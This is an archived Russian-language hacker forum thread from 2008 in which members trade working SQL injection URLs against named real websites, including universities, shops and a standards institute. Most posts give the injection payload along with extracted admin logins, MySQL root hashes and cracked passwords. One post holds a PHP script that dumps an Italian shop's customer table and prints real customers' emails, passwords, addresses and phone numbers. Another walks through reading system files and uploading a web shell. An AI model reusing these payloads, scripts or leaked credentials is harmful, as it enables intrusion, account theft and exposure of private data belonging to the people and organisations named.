SQL Инъекции [Архив] - Страница 28

Twoster

29.10.2008, 15:00

Скули из таблицы user базы mysql (5 шт.)

http://en.chinacourt.org/public/detail.php?id=-1+union+select+1,password,3,4,5,user,7,8,9,10,11+f rom+mysql.user+limit+1,1--
zq16167 ; 22f421104e6fdb11
Вот, и с MySQL паролик вытащили.
Проверьте, если есть желание...
просто пароль в публичной базе не нашел, а брутить... =(

http://www.medtechmammography.com/articles.php?id=-1+union+select+1,user,3,4,password,6,7+from+mysql. user+limit+0,1--
yroot ; 135a94ef50ef2ac7
http://www.medtechmammography.com/admin/ - phpMyAdmin 2.5.0
(PR 2)

http://www.beijing2008conference.com/articles.php?id=-1+union+select+user,password,3,4,5,6,7+from+mysql. user+limit+0,1--
root ; 7eba08fa3d983a6b
(PR 2)

http://www.greatleighs.com/articles.php?id=-1+union+select+1,password,3,user,5,6,7,8,9+from+my sql.user--
root ; 39d5d18a469d0dc5
(PR 3)

http://www.alumni.wayne.edu/news.php?id=-1+union+select+1,user,password,4,5,6+from+mysql.us er/*
root ; 41bb620c59bba24e
хеш не подобрал

:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::

Скули с админками (12 шт.):

http://www.passingdb.com/articles.php?id=-1+union+select+1,2,user_level,4,user_password,6,7, 8,9,10,11,username,13,14,15,16+from+phpbb_users+wh ere+user_level=1+limit+1,1--
Админ форума - Tof ; d780ef00c2edaf2f26f92e06a0db5f30 пароль - 5275326

http://www.sana-med.com.ua/articles.php?id=-1+union+select+1,username,3,user_password+from+san a_forum_users+limit+3,1--
Стоит phpBB форум! Вот логин;хеш админа, хеш подобрать не смог!
admin;9fed66b17b90086737f7718f83f2c6dd
Более 2600 зареганых пользователей

http://www.doctordans.com/articles.php?id=-1+union+select+1,name,password,4,5,6,7,8,9,10,11,1 2,13+from+cms_user--
http://www.doctordans.com/login.php
DanFanselow ; nae2Itha
Очень хорошо льется шелл =)

http://www.haltonheritage.com/articles.php?id=-1+union+select+1,2,3,4,username,6,7,8,password,10, 11,12,13,14,15,16+from+security--
chiefadmin ; chief
http://www.haltonheritage.com/admin/
Отлично льется шелл (Если его под видом pdf приаттачивать! =))
есть доступ к соседним сайтикам... короче интересное место! =)
(PR 2)

http://www.atlascaptives.com/articles.php?id=-1+union+select+1,2,password,4,Username+from+authus ers+limit+0,1--
http://www.atlascaptives.com/admin/
atlas ; 9455556
(PR 3)

http://www.al-nafeh.com/articles.php?op=1&id=-1+union+select+1,username,3,userpass,5,6+from+user--
admin ; al-nafeh
http://www.al-nafeh.com/admin/login.php
(PR 2)

http://www.techaltar.com/articles.php?id=-1+union+select+1,password,3,4,5,6,7,8,9,10,admin_i d,12,13,14,15,16,17,18,19,20,21,22+from+tech_admin s--
Логин - dinesh
хеш - 9c9f1c65b1dc1f79498c9f09eb610e1a
Пароль - dinesh
http://www.techaltar.com/admin/
(PR 0)

http://www.mickstaton.com/articles.php?ID=-1+union+select+username,password,3+from+admin--
mstaton ; goofy1
Есть админка, но пароль туда не подходит... =(
http://www.mickstaton.com/admin/
(PR 3)

http://www.switchvfx.com/en/about.php?id=-1+union+select+1,2,password,username+from+users/*
http://www.switchvfx.com/en/admin/
switchadmin ; w3bt3@m
Неполадки с сервером MySQL

http://antireality.net/articles.php?id=-1+union+select+1,2,name,4,5,6,password,8+from+memb ers+limit+0,1--
Randy53215 ; b1e0d66c6238a74d0c22f1e7576e797f
Подобрать хеш не смог!
Кстати, там какая то бага с авторизацией! При первом заходе я зашел под каким то юзверем,
и по глупости вышел, а рега не работает! =(
(PR 1)

http://antikwar.by/articles.php?mode=show&id=-1+union+select+1,2,3,pass,5,6+from+users/*
admin ; st0pkran
http://antikwar.by/admin/login.php
пароль почему то не подходит...

http://www.physics.hmc.edu/news.php?id=99999999999+union+select+1,2,3,usernam e,pwd+from+tuserinfo/*
http://www.hmc.edu/admin/
не работает! =(
(PR корневого сайта - 7, субдомена - 4)

:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::

Всякие-разные скули (28 шт.):

http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,version(),database()--

http://www.choices.edu/resources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26--

::::::::::::::::::::::::::::: Украина :::::::::::::::::::::::::::::

http://www.sadochek.com.ua/articles.php?id=-1+union+select+1,2,3--

http://www.nvip.com.ua/articles.php?id=999999999999+union+select+1,2,3,4, 5,6,7,8/*

http://m-nafta.com.ua/articles.php?p=details&id=-1+union+select+1,version(),database(),4,5--

http://jean-jack.com.ua/articles.php?id=-1+union+select+version(),2,database()--

::::::::::::::::::::::::::::: Зона .com :::::::::::::::::::::::::::::

http://frontrowmanila.com/articles.php?id=-1+union+select+1,version(),database(),4,5,6--
(PR ???)

http://stayhealthy-livewell.com/articles.php?id=-1+union+select+1,version(),database(),user(),5,6,7 ,8,9,10,11,12,13,14--
(PR 0)

http://www.fluidmission.com/articles.php?id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10,1 1,12,database()--
(PR 0)

http://www.joannetherrien.com/articles.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11--
(PR 3)

http://www.somachlaw.com/articles.php?id=-1+union+select+1,2,3,4,5,6--
(PR 4)

http://carlighthouse.com/articles.php?id=-1+union+select+1,password,username,4,5,6,7+from+ad minlogin+limit+0,1--
админка похоже тут http://carlighthouse.com/admin/login.php
Но что то пока не пашет!
(PR 0)

http://www.voiceforhumanity.com/articles.php?id=-1+union+select+1,version(),3,database(),5,6,7,8,9, 10,11--
(PR 4)

http://www.u-coc.com/articles.php?id=-1+union+select+1,2,3,4--
(PR 1)

http://www.greatermedia.com/press/detail.php?ID=-1+union+select+1,version(),3,4,5,6,7,8,9,user(),11 ,12,13,14,15,16,17,18--

::::::::::::::::::::::::::::: Зона .net :::::::::::::::::::::::::::::

http://www.andrewsimon.net/articles.php?id=-1+union+select+1,2,version(),4,user(),6,7,database ()/*
(PR 3)

http://www.bacuser.net/articles.php?id=-1+union+select+1,2,3,4,5/*
(PR 1)

http://rndfido.net/articles.php?id=-1+union+select+1,2,3,4,5,6/*
(PR 3)
::::::::::::::::::::::::::::: Англия :::::::::::::::::::::::::::::

http://www.cedexx.co.uk/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*
Есть админка, нерабочая, дальше искать не стал.
http://www.cedexx.co.uk/admin/

http://www.emgonline.co.uk/articles.php?id=-1+union+select+1,table_name,3,4,5,6,7+from+informa tion_schema.TABLES+limit+17,1--
Админку не нашел
::::::::::::::::::::::::::::: Австралия :::::::::::::::::::::::::::::

http://unichat.com.au/articles.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+inf ormation_schema.TABLES+limit+56,1--
http://unichat.com.au/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users--
Вот тут непонятно... из information_schema достает, а из своей не хочет... странно...

http://www.vistageconsulting.com.au/articles.php?mid=1&id=-1+union+select+1,2,3--
Не смог подобрать таблицу юзверей! Вероятнее всего стоит префикс...

::::::::::::::::::::::::::::: Белоруссия :::::::::::::::::::::::::::::

http://kosmetika.of.by/articles.php?mode=show&id=-1+union+select+1,2,3,4,5,6/*
Также не смог подобрать таблицу... =(

http://noutbuk.by/articles.php?category=0&mode=show&id=-1+union+select+1,2,3,4,5,6,7/*
http://noutbuk.by/admin/
Также не смог подобрать таблицу... =(

::::::::::::::::::::::::::::: Италия :::::::::::::::::::::::::::::

http://www.myxbox.it/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://www.italiaoil.it/news.php?ID=-1+union+select+1,2,user,password,5,6,7,8,9,10,11,1 2+from+mysql.user--
хм... странный сайт... из базы достает юзеров а пароли нет... рут переименовал столбец чтоли...

http://www.awanet.it/news.php?id=-1+union+select+1,2,3,4,5/*

::::::::::::::::::::::::::::: Зона .info :::::::::::::::::::::::::::::

http://tipsforliving.info/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*
http://tipsforliving.info/admin/
Админка похоже закрыта .htaccess по ip... =(

Итого: 45 скулей! =)

P.S. Если есть неточности, пожалуйста сообщите, скули были найдены несколько дней назад, мошли измениться пароли и т.п.

InFlame

29.10.2008, 20:18

http://www.heimlichinstitute.org/page.php?id=-34+union+select+1,unhex(hex(version())),unhex(hex( concat_ws(0x3a,password,user))),4+from+mysql.user+ limit+1,1/*
MySQL Version: 5.0.17-nt-log

kair

29.10.2008, 20:28

http://www.persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6, 7+from+prelude--

http://www.reper.ru/rus/index.php?catid=-91%20union%20select%201,2,3,version(),5,6,7,8,9,0, 1,2,3,4%20admin/*

SVAROG

30.10.2008, 03:55

http://www.remhq.com/news_story.php?id=-894'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7/*
5.0.45-log

USAkid

30.10.2008, 10:19

5.0.45-log

А дальше?

http://www.remhq.com/news_story.php?id=-894'+union+select+1,concat_ws(username,0x3a,passwo rd,0x3a,accesslevel),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 +from+hero_users+limit+0,1/*

Iceangel_

30.10.2008, 11:06

исключительно .edu

Lake Superior State University
http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12+from+information_schema.tables+limit+29,1/*
PR=7
5.0.20
-------------------------------------------------------------------

National Center for Supercomputing Applications at the University of Illinois(во как!)
http://www.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1000+union+select+1,version(),3,4,5,6,7,8,9,10/*
PR=7
5.0.45-log 3
пути: /afs/ncsa.uiuc.edu/web/www-2006/site/htdocs/AboutUs/People/mailto_func.php
-------------------------------------------------------------------

University of Pennsylvania
http://asam.sas.upenn.edu/detail.php?id=-861+union+select+1,2,3,unhex(hex(version())),5,6,7 ,8,9,10,11--
PR=7
4.1.15-standard
пути: /var/www/ASAM/detail.php

MaSTeR GэN

30.10.2008, 13:11

prontospesa.it
средних размеров онлайн шоп

http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646

таблицы:

DM-Reward
DM-Target-Campagna
DM-Campagne
ReachKeyGenerale
dtproperties
Acquisti
Acquisto
CAP
Carrelli
Carrello
Commessi
Config
CostiConsegna
CRM
ECommerce
ECommerce1
ECommerce3
IVA
ListaPersonale
MailAccount
Offerta
Offerte
Operatori
ReachKey
Risultati
SenzaEAN
Supermarket
SuperMarket_Cat
Supermarket0
sysconstraints
syssegments
ToDo
Utenti
Utenti_OnLine

кто не ленивый может найдет где нить там кт ;)Мне лично лень :)
Вытягиваем из таблицы Utenti - email+pass+всякая кадабра типа адреса:

http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(Id Utente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as% 20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarc har)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27 %3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bca st(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(Ragio neSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indiri zzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20n varchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B% 27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A% 27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bc ast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Te lefono3+as%20nvarchar)+from+Utenti+where+IdUtente= 1)--

скрипт на Php для дампинга таблицы Utenti

<?
set_time_limit(0);
function send_get($get_url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $get_url);
curl_setopt($ch,CURLOPT_COOKIEFILE,"./htdocs/1.txt");
curl_setopt($ch, CURLOPT_HEADER,0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,30);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
return $data = curl_exec($ch);
}
$postfix = 0;
$filename = "base".$postfix.".txt";
$desp = fopen ($filename,"a+");
for ($id=0;$id<30000;$id++){
$get_url="http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(Id Utente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as% 20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarc har)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27 %3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bca st(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(Ragio neSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indiri zzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20n varchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B% 27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A% 27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bc ast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Te lefono3+as%20nvarchar)+from+Utenti+where+IdUtente=".$id.")--";
$str=send_get($get_url);
if (preg_match("/nvarchar\040'(.*)'\040in\040una\040colonna/",$str,$matches)) {
echo $matches[1];
fputs($desp,$matches[1]);
fputs($desp,"\n");
}
}
fclose($desp);
?>

Вотс чего получаем на выходе :

1:elena.abba@dmgroup.it:fabio:1:Elena:Abbà::Via BOVE 14:Torino:10129:TO:011 5097327::
3:abbena@dm.unito.it:micoledo:1:Elsa:Abbena::S.da della bocchetta11:Sciolze:10090:TO:011 9603558::
9:matteo.adinolfi@tele2.it:grages64:1:Matteo:Adino lfi::C.so Corsica 45/C:Torino:10135:TO:0113170570::3290848091
12:loaffat@tin.it:nilde:1:Nilde:Affatato::strada del Drosso 140/D:Torino:10135:TO:0113472847::3335336138

R1dex

30.10.2008, 16:03

http://shariki.com/news/?id=-1{SQLINJ}

Database Version: 5.0.67-log
Database name: u58240
User name: u58240@10.10.223.217

Fugitif

30.10.2008, 18:34

http://www.adultfyi.com/read.php?ID=1%20UNION%20SELECT%201,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8/*
4.1.22-log:adultfyi:adultfyi@localhost

http://www.yesilyurtlar.com.tr/en/urun.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6,7,8/*
4.1.20:yesilyurtlar_en:yesilyurtlar@localhost

N1K70

31.10.2008, 12:37

http://www.webhoster4u.de/server.php?id=-132+union+all+select+database(),version()--
4.1.22-standard ;)

=HALK=

01.11.2008, 00:02

Pr4
http://www.thenaturenetwork.net/news/news.php?news_id=-1+union+select+1,2,3,4,5,concat_ws(0xb,version(),u ser(),database()),7,8,9,10,11,12,13,14,15,16--

вот таблицы с колонками:
http://tables-columns.narod.ru/thenaturenetwork.net.txt

cash$$$

01.11.2008, 01:07

http://www.icehw.net/article.php?id=...,13,14,15,16--

version: 5.0.22-Debian_0ubuntu6.06.3-log
user: icehw@localhost
database: icehw_main

table: login
Concat_ws(0x3a,ID,username,PASSWORD)

http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,n ame,pass),7,8,9+from+adbm_user--

admin:1d1ac3f687c1572b5654e3fbd502a7c9

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1--

login:brianficek
pass:85688717ef4fab9

lastsmile

01.11.2008, 02:01

НОВЫЕ ТЕХНОЛОГИИ ЗАЩИТЫ ИНФОРМАЦИИ-7000
Яндекс тИЦ 240
Google Page Rank 5

http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+version(),2,3,4

version() 5.0.51a
user() w7000@localhost
database() w7000

7000_news
1. id
2. news_text
3. news_date
4. mode1
5. mode2
6. news_link
7. news_title
7000_stuff_messages
1. id
2. section
3. date
4. login
5. parent
6. topic
7. message
8. made
9. city
10. type
11. quality
12. price
13. seen
7000_stuff_sections
1. id
2. title
7000_stuff_users
1. id
2. login
3. password
4. email
5. address
6. occupation
7. homepage
8. interests
9. icq
10. sendnews
@x0Elvarc
1. id
2. title
TCat
1. id
2. title
3. id_cat
4. pos
banner_buys
1. id
2. bid
3. sid
4. uid
5. ip
6. crt
7. extra
banner_click
1. id
2. bid
3. ip
4. crt
5. sid
6. zoneid
banner_content
1. id
2. path
3. btype
4. header
5. crt
6. url
banner_main
1. id
2. zoneid
3. crt
4. shows
5. bansrc
6. on_off
7. frequency
banner_sessions
1. id
2. sid
3. ip
4. crt
banner_sites
1. id
2. description
3. url
banner_source
1. id
2. sizev
3. sizeh
4. type
banner_user
1. id
2. bid
3. crt
4. uid
5. bansid
6. shows
banner_zones
1. id
2. siteid
3. width
4. on_off
5. description
banscanusers
1. id
2. name
3. mail
4. www
5. phone
6. ip
7. login
8. pass
cat
1. id
2. name
3. text
4. rz
5. vis
6. konfig
7. pos
8. ismain
9. textmain
10. photomain
catalog
1. id
2. parent_id
3. is_section
4. title
5. price
categbd
1. number
2. cat
categbd1
1. nomer
2. name
3. subcat
4. dateadd
5. lang
6. homepage
7. ratadm
8. ratusr
9. download
10. url
11. description

далее уже влом искать что-то....

USAkid

01.11.2008, 08:40

далее уже влом искать что-то....

А че там дальше то копать?

Пошли юзвери:
http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+concat_ws(login,0x3a,password),2,3, 4+from+7000_stuff_users+limit+01--
Пассы в открытом виде :)

Iceangel_

01.11.2008, 09:12

продолжаем .edu инъекции...

х.з что...
http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1047+union+select+1,2,3,4,version(),6,7,8,9/*
4.1.12-log
PR=0
----------------------------------------------------------------

Institute for NanoBioTechnology
http://inbt.jhu.edu/facultyexpertise.php?id=personalresult&usr=-45+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22/*
4.1.22-standard
PR=5
----------------------------------------------------------------

Portland State University
http://web.pdx.edu/~salp/salp_saga/calendar.php?action=view&id=-1143+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13--
5.0.37
PR=4
----------------------------------------------------------------

х.з что, да еще и со слепой инъекцией...
http://cils.exploratorium.edu/cils/page.php?ID=148+union+select+1,2,3,4--
PR=6

Ponchik

02.11.2008, 04:52

standard.md
ппц, национальный институт стандартизации и всей фигни и с дырками, куда катится молднет =\
Вобще вывод непонятно какой
http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()/*
Непонятно какая версия... Но
http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()+FROM+information_schema.t ables/*
Работает, значит 5, а кому надо разберётся и с выводом :)

-=megahertz=-

02.11.2008, 23:54

пончик ты даже кол-во полей не подобрал... еще и говоришь что вывод непонятно какой

Spyder

03.11.2008, 00:26

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+version()/*
как бэ вывод в заголовке
Пончик, ты забыл там кавычку поставить

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+concat(username,':',password)+from +users/*

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/etc/passwd')+from+users/*
Так как там фряха, можно средствами load_file читать дериктории, находим httpd.conf
http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/local/etc/apache2/httpd.conf')+from+users/*
Смотри сорц, находим строку
DocumentRoot "/usr/home/insm/www"
читаем эту диру
http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/home/insm/www')+from+users/*
Щас копаю, воде в веб нельзя залить файл
PS нашёл, папка public доступна на запись))
Вобще ссылку на шелл кидать не буду, те кто умеют зальют =)

Safe mode: OFF
Disable functions: 0
OS: FreeBSD gw.standard.md 5.2.1-RELEASE-p11 FreeBSD 5.2.1-RELEASE-p11 #0: Fri Oct 15 09:17:15 EEST 2004 sv@gw.standard.md:/usr/obj/usr/src/sys/standard.v0 i386

PPS если чё, то там allow_url_fopen = On и в штацессе закрыт доступ к php файлам, решается заливкой phtml

Cennarios

03.11.2008, 02:05

http://www.sticma.com.br/cursos_ver.php?id=-1+union+select+1,2,concat_ws(0x3a3a,nome,Senha,ema il),4,5,6,7,8,9,10,11+from+usuario+limit+0,1
login:admin
pass:sind2008

Админка:http://www.sticma.com.br/admin

Microsoft-IIS/6.0. PHP/5.2.5
Windows NT WINDOWS 5.2 build 3790
NOT SECURE

Достаточно грамотно выставлены права. Выше корня конкретного хоста не лезет.

Есть возможность залить шелл.
---------------------------------------------------------------

P.S. Студия создавша сей ресурс сама страдает sql-inj.
http://www.fonteweb.com.br/solucoes.php?id=-1+union+select+1,concat_ws(0x3a3a,nome,Senha,email ),3,4,5,6,7+from+usuario+limit+0,1
Хеш не подбрутился. Да и дальше копать не стал.
Но походу у них все проекты плешивые...

Fuckel

03.11.2008, 04:39

Twoster

03.11.2008, 05:56

::::::::::::::::::::Америка:::::::::::::::: ::::::::::
http://www.warwick.k12.pa.us/news.php?id=-1+union+select+1,2,3,password,5,user,7,8,9+from+my sql.user/*
root ; 32b4889c7569b9c5

http://www.youth.md/index.php?id=-1+union+select+concat_ws(0x3a,user,password)+from+ mysql.user+limit+0,1--
root ; 2e772d7646f9c841

http://www.rtg.us/news.php?mode=detail&id=-1+union+select+1,username,password,4,5,6,7,8+from+ admins/*
http://www.rtg.us/admin/
admin ; puhhema

::::::::::::::::::::Молдавия:::::::::::::: ::::::::::::
http://oficinadeempleos.us/index.php?page_id=-1&news_id=-1+union+select+1,2,3,4,5,6--

http://www.ong.md/index.php?mod=home&hmod=static&id=-1+union+select+1,2,3/*

http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+table_name+from+information_schema. TABLES+limit+21,1--
http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+password+from+tbl_admin--
Поле password присутствует, однако почему то не выводится...

http://businessclass.lunatic.md/index.php?mod=poll&id=-1+union+select+1,2,3--
::::::::::::::::::::name::::::::::::::::::::::::::
http://vegasfastener.name/news.php?id=-1+union+select+1,concat_ws(char(58),version(),data base(),user()),3,4,5,6,7--

::::::::::::::::::::ru::::::::::::::::::::::::::
http://www.mybells.ru/read.php?id=-1+union+select+1,concat_ws(char(58),version(),data base(),user()),3,4,5,6,7,8--

http://mkl.aeroschool.ru/read.php?id=-1+union+select+table_name+from+information_schema. TABLES+limit+49,1--

http://www.eng.technet.ru/print.php?id=-1+union+select+1,2,3,concat_ws(char(58),user,passw ord),5,6,7,8,9,10+from+mysql.user+limit+0,1--&type=a

http://www.2kaudit.ru/print.php?t=projects&id=-1+union+select+1,2,3,login,5,passwd,7,8,9,10,11+fr om+users+limit+0,1--
http://www.2kaudit.ru/login.php
Вход вроде бы тут, однако ни один пароль не подошел!

http://www.masterstone.ru/print.php?p=rek&id=-1+union+select+1,2,version(),4,5,6--

http://art.specialradio.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--

http://www.2kaudit.ru/print.php?t=mark&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--

http://www.listok-veterana.ru/print.php?ID=-1+union+select+1,login,3,4,5,6,7,8,pass,10,11,12,1 3,14,15,16,17,18,19+from+users--

http://www.maxpremium.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8--

xPriZrAkx

03.11.2008, 13:32

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,ver sion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42, 53,54,55/* 5.0.32-Debian_7etch6-log

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,cou nt(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,42,53,54,55+from+information_schema.tables/* 847 Таблицы

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,con cat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,42,53,54,55+from+mysql.user-- root:*99619676BCC438CF465A8CADAB3A1305E6A44AB9

-------------------------------------------------------------------------------------------------------------------------------------------

http://chspr.queensu.ca/bio.php?User_ID=26+and+1=0+union+select+1,2,versio n(),4,5,6,7,8,9,10,11,12,13,14,15,16-- 5.0.51b 4

http://chspr.queensu.ca/bio.php?User_ID=26+and+1=0+union+select+1,2,count( table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+from+ information_schema.tables-- 57 Таблиц

-------------------------------------------------------------------------------------------------------------------------------------------

http://www.travellingbirder.com/tripreports/view_birding_tripreport.php?id=157+union+select+1, 2,3,4,5,6,7,8-- 5.0.27-standard

-------------------------------------------------------------------------------------------------------------------------------------------

http://www.lcoastpress.com/books_series.php?id=13+union+select+1,2,version()-- 4.1.22

-------------------------------------------------------------------------------------------------------------------------------------------

http://www.visitrandolphcounty.com/attractions.php?id=4+union+select+1,2,version(),4, 5,6,7,8,9,10,11,12,13,14,15,16,17-- 4.1.20

-------------------------------------------------------------------------------------------------------------------------------------------

http://www.pakistanintelligence.com/articles.php?id=14+union+select+1,2,3,version(),5, 6,7,8-- 4.1.20-max-log

-------------------------------------------------------------------------------------------------------------------------------------------

http://www.jones.com/careers/jonesCareer.php?ID=5+union+select+1,2,3,version(), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 4.0.17

Spyder

03.11.2008, 17:17

Fuckel, над чем ты поржал? над тем что ты можешь залить шелл только через файл менеджер?))) Давай вместе над этим поржём)

пс за собой прибераемся

С хуя ли я должен свой шелл удалять? :D
Пиздец хакеров развелось, найдут файл менеджер и уже выйбываются

xPriZrAkx

03.11.2008, 17:43

http://stocknetwork.co.uk/comments.php?id=23+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24/* 5.0.21-Debian_3ubuntu1-log

http://www.musicworksunlimited.com/news.php?news_id=12+and+1=0+union+select+1,2,3,ver sion()/* 4.1.20

http://www.director-online.com/buildArticle.php?id=-1118+and+1=0+union+select+1,2,3,4,5,version(),7,8/* 4.1.22-standard-log

http://www.pangeaday.org/filmDetail.php?id=14+union+select+1,2,3,4,5,6,vers ion(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3
-- 5.0.45-log

https://thewinemakershop.com/recipes.php?cat_id=1&item_id=5+and+1=0+union+select+1,2,version(),4,5,6-- 5.0.67-log
winemakershop@72.167.131.151
winemakershop

xPriZrAkx

03.11.2008, 17:48

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23--

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23+from+informati on_schema.tables--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23+from+informati on_schema.columns+where+column_name+like+0x25656d6 1696c--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x6368616e6765 5f656d61696c--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6368 616e67655f656d61696c+limit+0,1--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x646174696e67 5f626c6f636b6d61696c--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6461 74696e675f626c6f636b6d61696c+limit+0,1--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x646174696e67 5f617374726f6c6f6779--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6461 74696e675f617374726f6c6f6779+limit+0,1--
